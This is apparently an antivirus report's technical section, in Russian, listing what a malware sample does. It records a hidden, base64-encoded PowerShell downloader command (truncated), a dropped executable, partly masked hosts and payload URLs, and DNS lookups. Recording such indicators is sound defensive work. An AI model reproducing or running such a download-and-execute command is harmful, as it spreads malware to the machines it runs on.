Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADMAMQBfADIAXwA1AD0AKAAnAEoANgBfADMANgAnACsAJwA5ACcAKQA7ACQAaAAyADgAOAAxAF8AXwBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEYAOQBfADcANgAzADEAMwA9ACgAJwBoAH...
- %HOMEPATH%\980.exe
- %HOMEPATH%\980.exe
- '15#.#9.153.180':80
- '20#.#54.223.104':80
- 'zh##o.ir':80
- 'pr###herb.ru':80
- http://15#.#9.153.180/PirPKmVSvCUrD_faC0bF8
- http://20#.#54.223.104/usgfmGl
- http://zh##o.ir/5lJEfpVX9e7_6Hm
- http://pr###herb.ru/IeuJlgdj6_D
- DNS ASK zh##o.ir
- DNS ASK pr###herb.ru
- DNS ASK va####hpress.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADMAMQBfADIAXwA1AD0AKAAnAEoANgBfADMANgAnACsAJwA5ACcAKQA7ACQAaAAyADgAOAAxAF8AXwBfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEYAOQBfADcANgAzADEAMwA9ACgAJwBoAH...' (со скрытым окном)